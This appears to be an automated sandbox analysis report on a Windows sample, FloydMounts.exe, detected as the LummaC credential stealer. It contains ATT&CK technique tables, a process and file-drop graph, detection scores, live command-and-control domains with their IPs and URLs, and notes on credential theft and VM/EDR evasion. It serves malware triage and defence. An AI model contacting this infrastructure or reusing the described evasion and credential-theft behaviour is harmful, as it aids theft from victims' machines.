              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation              		1
              DLL Side-Loading              		12
              Process Injection              		111
              Masquerading              		2
              OS Credential Dumping              		421
              Security Software Discovery              		Remote Services11
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API              		Boot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		21
              Virtualization/Sandbox Evasion              		11
              Input Capture              		21
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		12
              Process Injection              		Security Account Manager3
              Process Discovery              		SMB/Windows Admin Shares31
              Data from Local System              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS2
              System Owner/User Discovery              		Distributed Component Object Model1
              Clipboard Data              		14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Abuse Elevation Control Mechanism              		LSA Secrets13
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain Credentials225
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581279 Sample: FloydMounts.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 95 wetlivelky.click 2->95 97 klipjarifaa.shop 2->97 99 cCOKcDhDNH.cCOKcDhDNH 2->99 107 Suricata IDS alerts for network traffic 2->107 109 Multi AV Scanner detection for submitted file 2->109 111 Yara detected LummaC Stealer 2->111 113 Sigma detected: Search for Antivirus process 2->113 14 FloydMounts.exe 21 2->14         started        signatures3 process4 file5 93 C:\Users\user\AppData\Local\Temp\Briefing, DOS 14->93 dropped 17 cmd.exe 2 14->17         started        process6 file7 73 C:\Users\user\AppData\Local\...\Produces.com, PE32 17->73 dropped 105 Drops PE files with a suspicious file extension 17->105 21 Produces.com 1 17->21         started        26 extrac32.exe 17 17->26         started        28 cmd.exe 2 17->28         started        30 8 other processes 17->30 signatures8 process9 dnsIp10 101 wetlivelky.click 104.21.25.41, 443, 49739, 49740 CLOUDFLARENETUS United States 21->101 103 klipjarifaa.shop 104.21.74.235, 443, 49763 CLOUDFLARENETUS United States 21->103 79 C:\Users\user\...\X4PCDQPDT1B8IDPB7SN83.exe, PE32 21->79 dropped 115 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->115 117 Query firmware table information (likely to detect VMs) 21->117 119 Tries to harvest and steal ftp login credentials 21->119 121 2 other signatures 21->121 32 X4PCDQPDT1B8IDPB7SN83.exe 2 21->32         started        81 C:\Users\user\AppData\Local\Temp\Freight, DOS 26->81 dropped file11 signatures12 process13 file14 71 C:\Users\user\...\X4PCDQPDT1B8IDPB7SN83.tmp, PE32 32->71 dropped 35 X4PCDQPDT1B8IDPB7SN83.tmp 3 5 32->35         started        process15 file16 75 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 35->75 dropped 77 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 35->77 dropped 38 X4PCDQPDT1B8IDPB7SN83.exe 2 35->38         started        process17 file18 83 C:\Users\user\...\X4PCDQPDT1B8IDPB7SN83.tmp, PE32 38->83 dropped 41 X4PCDQPDT1B8IDPB7SN83.tmp 5 7 38->41         started        process19 file20 85 C:\Users\user\AppData\...\ulu_mon.exe (copy), PE32 41->85 dropped 87 C:\Users\user\AppData\...\is-PGV92.tmp, PE32 41->87 dropped 89 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 41->89 dropped 91 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 41->91 dropped 44 ulu_mon.exe 41->44         started        47 cmd.exe 41->47         started        49 cmd.exe 41->49         started        51 5 other processes 41->51 process21 signatures22 123 Tries to detect virtualization through RDTSC time measurements 44->123 125 Switches to a custom stack to bypass stack traces 44->125 127 Found direct / indirect Syscall (likely to bypass EDR) 44->127 53 conhost.exe 47->53         started        55 tasklist.exe 47->55         started        57 find.exe 47->57         started        59 conhost.exe 49->59         started        61 tasklist.exe 49->61         started        63 find.exe 49->63         started        65 conhost.exe 51->65         started        67 conhost.exe 51->67         started        69 11 other processes 51->69 process23

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              FloydMounts.exe25%VirustotalBrowse
              FloydMounts.exe18%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\174436\Produces.com0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Freight0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-7TFI6.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-7TFI6.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-HQ019.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-HQ019.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://klipjarifaa.shop/int_clp_prof.txt0%Avira URL Cloudsafe
              http://www.cyberotecnica.net)0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclDateTime0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSysUtils0%Avira URL Cloudsafe
              http://version.zipgenius.it0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/sevenzip.p0%Avira URL Cloudsafe
              http://crl.usertr0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclAppInst0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclBase.pas0%Avira URL Cloudsafe
              http://www.drbob42.com0%Avira URL Cloudsafe
              https://wetlivelky.click/api0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclMath.pas0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclWin32.p0%Avira URL Cloudsafe
              http://skin.zipgenius.itopenU0%Avira URL Cloudsafe
              http://skin.zipgenius.it0%Avira URL Cloudsafe
              http://volftp.tiscali.it)0%Avira URL Cloudsafe
              http://help.zipgenius.it/0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/Jcl8087.pas0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclAnsiStri0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/bzip2.pas0%Avira URL Cloudsafe
              http://antivirus.zipgenius.it0%Avira URL Cloudsafe
              http://italian.wunderground.com/global/stations/16422.html0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSynch.pa0%Avira URL Cloudsafe
              http://members.home.nl/rtimmermans/0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclCharsets0%Avira URL Cloudsafe
              http://www.zipgenius.it/0%Avira URL Cloudsafe
              http://pcpro.mondadori.com)0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclRTTI.pas0%Avira URL Cloudsafe
              http://italian.wunderground.com/global/stations/16422.htmlopenhttp://italian.wunderground.com/global0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclStreams.0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclStringCo0%Avira URL Cloudsafe
              http://help.zipgenius.com/0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclIniFiles0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclRegistr0%Avira URL Cloudsafe
              http://www.wininizio.it0%Avira URL Cloudsafe
              http://www.zipgenius.it/zg5/addon/HiColSFX.exeopenU0%Avira URL Cloudsafe
              http://help.zipgenius.it0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclUnitVers0%Avira URL Cloudsafe
              http://www.ilsoftware.it)0%Avira URL Cloudsafe
              http://faq.zipgenius.it/0%Avira URL Cloudsafe
              http://api.qrtag.net/qrcode/240/0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclWideStri0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/Snmp.pas0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclUnicode.0%Avira URL Cloudsafe
              http://www.zipgenius.it0%Avira URL Cloudsafe
              http://www.zipgenius.it/U0%Avira URL Cloudsafe
              http://www.virusportal.com/com/virusinfo/encyclopedia/results.aspx?term=0%Avira URL Cloudsafe
              http://www.programmiamo.net)0%Avira URL Cloudsafe
              http://www.7-zip.org)0%Avira URL Cloudsafe
              http://www.snapfiles.com)0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSimpleXm0%Avira URL Cloudsafe
              http://www.zipgenius.it/zg5/external_app.htmopenU0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclResource0%Avira URL Cloudsafe
              http://antivirus.zipgenius.itopenU0%Avira URL Cloudsafe
              http://www.quickzip.org0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclSecurit0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclCompress0%Avira URL Cloudsafe
              http://www.reggiocal.it0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSysInfo.0%Avira URL Cloudsafe
              http://www.winmagazine.it)0%Avira URL Cloudsafe
              http://forum.zipgenius.itopenU0%Avira URL Cloudsafe
              http://forum.wininizio.it0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclMime.pas0%Avira URL Cloudsafe
              http://www.zipgenius.itopenU0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclShell.p0%Avira URL Cloudsafe
              http://www.zipgenius.com/index.php?id=940%Avira URL Cloudsafe
              http://help.zipgenius.itU0%Avira URL Cloudsafe
              http://www.zipgenius.it/zg5/external_app.htm0%Avira URL Cloudsafe
              http://faq.zipgenius.com/0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/zlibh.pas0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclFileUtil0%Avira URL Cloudsafe
              http://downloads.zipgenius.it0%Avira URL Cloudsafe
              http://help.zipgenius.com0%Avira URL Cloudsafe
              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclLogic.pa0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              klipjarifaa.shop
              		104.21.74.235
              		truefalse
                		unknown
                wetlivelky.click
                		104.21.25.41
                		truetrue
                  		unknown
                  cCOKcDhDNH.cCOKcDhDNH
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://klipjarifaa.shop/int_clp_prof.txtfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://wetlivelky.click/apitrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclDateTimeis-PGV92.tmp.20.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUX4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000000.2547757785.00000000002C1000.00000020.00000001.01000000.00000008.sdmpfalse
                      		high
                      http://www.cyberotecnica.net)ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.vmware.com/0ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/sevenzip.pis-PGV92.tmp.20.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.drbob42.comulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSysUtilsis-PGV92.tmp.20.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.usertrX4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclBase.pasis-PGV92.tmp.20.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclAppInstis-PGV92.tmp.20.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.google.com/search?sourceid=ZG6&q=%22is-PGV92.tmp.20.drfalse
                          		high
                          http://version.zipgenius.itulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/Jcl8087.pasis-PGV92.tmp.20.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://skin.zipgenius.itopenUulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.remobjects.com/psX4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000003.2560003095.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000003.2552320717.0000000002C2F000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000000.2561740283.0000000000471000.00000020.00000001.01000000.00000009.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000000.2575985053.00000000008CD000.00000020.00000001.01000000.0000000B.sdmpfalse
                            		high
                            https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclWin32.pis-PGV92.tmp.20.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclMath.pasis-PGV92.tmp.20.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.innosetup.com/X4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000003.2560003095.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000003.2552320717.0000000002C2F000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000000.2561740283.0000000000471000.00000020.00000001.01000000.00000009.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000000.2575985053.00000000008CD000.00000020.00000001.01000000.0000000B.sdmpfalse
                              		high
                              http://skin.zipgenius.itulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclAnsiStriis-PGV92.tmp.20.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://help.zipgenius.it/ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://volftp.tiscali.it)ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.certum.pl/CPS0X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/bzip2.pasis-PGV92.tmp.20.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://antivirus.zipgenius.itulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://italian.wunderground.com/global/stations/16422.htmlulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSynch.pais-PGV92.tmp.20.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pcpro.mondadori.com)ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.zipgenius.it/ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.certum.pl/ctnca.crl0kX4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.7-zip.orgulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                    		high
                                    http://members.home.nl/rtimmermans/ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.autoitscript.com/autoit3/XProduces.com, 0000000B.00000000.1689779944.0000000000285000.00000002.00000001.01000000.00000007.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrorFloydMounts.exefalse
                                        		high
                                        https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclCharsetsis-PGV92.tmp.20.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.symauth.com/cps0(ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclRTTI.pasis-PGV92.tmp.20.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://italian.wunderground.com/global/stations/16422.htmlopenhttp://italian.wunderground.com/globalulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclStringCois-PGV92.tmp.20.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.symauth.com/rpa00ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclStreams.is-PGV92.tmp.20.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.info-zip.org/ulu_mon.exe, 0000002F.00000002.3162136925.0000000005DBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://help.zipgenius.com/ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclIniFilesis-PGV92.tmp.20.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclRegistris-PGV92.tmp.20.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.wininizio.itulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://help.zipgenius.itulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.zipgenius.it/zg5/addon/HiColSFX.exeopenUulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ilsoftware.it)ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclUnitVersis-PGV92.tmp.20.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://repository.certum.pl/cscasha2.cer0X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
